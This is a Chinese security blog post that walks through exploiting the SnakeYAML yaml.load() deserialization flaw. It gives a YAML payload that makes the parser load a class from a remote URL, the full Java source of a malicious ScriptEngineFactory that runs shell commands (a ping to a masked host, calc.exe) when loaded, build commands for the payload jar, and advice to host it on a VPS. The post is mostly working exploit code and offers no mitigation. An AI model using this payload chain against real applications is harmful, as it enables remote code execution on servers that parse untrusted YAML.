微慑信息网

yaml.load()反序列化漏洞测试

朋友在项目中遇到一个上传yaml文件的点,才知道还有个yaml反序列化;记录下;

关键:YAML、 yaml.load()

场景:项目上的场景是存在上传yaml文件,刚好调用了ymal.load()

新建一个maven项目,pom.xml中添加:

    <dependencies>
        <dependency>
            <groupId>org.yaml</groupId>
            <artifactId>snakeyaml</artifactId>
            <version>1.17</version>
        </dependency>
    </dependencies>

创建一个类,进行yaml调用:

package src.main;
import org.yaml.snakeyaml.Yaml;

public class mYmlTest {
    public static void main(String[] args) {
        String normal ="hello  ";
        Yaml yaml =new Yaml();
        Object obj = yaml.load(normal);
        System.out.println(obj);
    }
}
 class mYml {
    public static void main(String[] args) {
        String mevil = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader " +
                "[[!!java.net.URL [\"HTTP://yamltest.*****\"]]]]";
        Yaml yaml = new Yaml();
        Object obj = yaml.load(mevil);
        System.out.println("ok222");
    }
}

 

运行mYmal:

需要执行命令的话,将url替换为jar文件,从而触发:

jar文件源码:https://github.com/artsploit

关键java文件代码:

package doexp;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("ping -c yaml.***");
            Runtime.getRuntime().exec("cmd /c calc.exe")
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

 

编译方法:

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

生成jar后,找台vps http挂载就行,或者本地phpstudy搭个web也可;

 

参考文章:

https://chenergy1991.github.io/2019/04/27/yaml.load%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/

https://github.com/artsploit

https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

拓展阅读(点评/知识):

备注:

src下有

META-INF\services\javax.script.ScriptEngineFactory

如果编译的时候缺少这个文件,则在调用的时候无法成功,查询了下资料如下:

在项目自己的META-INF文件夹中建立一个名为services的文件夹,如WAR包,则为{$Context}WebContent META-INFservices。在该文件夹中创建一个名为org.apache.commons.logging.LogFactory的文件,在该文件中只加入一句话:org.apache.commons.logging.impl.Log4jFactory。意思很简单,那就是为 org.apache.commons.logging.LogFactory类指定了在当前项目中的实现类:org.apache.commons.logging.impl.Log4jFactory。

或者参考oracle的说明:https://docs.oracle.com/javase/6/docs/api/java/util/ServiceLoader.html

service is a well-known set of interfaces and (usually abstract) classes. A service provider is a specific implementation of a service. The classes in a provider typically implement the interfaces and subclass the classes defined in the service itself. Service providers can be installed in an implementation of the Java platform in the form of extensions, that is, jar files placed into any of the usual extension directories. Providers can also be made available by adding them to the application’s class path or by some other platform-specific means.

大概是提供类的实现接口,从而被调用

 

 

 

 

 

本文标题:yaml.load()反序列化漏洞测试
本文链接:
(转载请附上本文链接)
https://vulsee.com/archives/vulsee_2019/1025_9168.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » yaml.load()反序列化漏洞测试
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们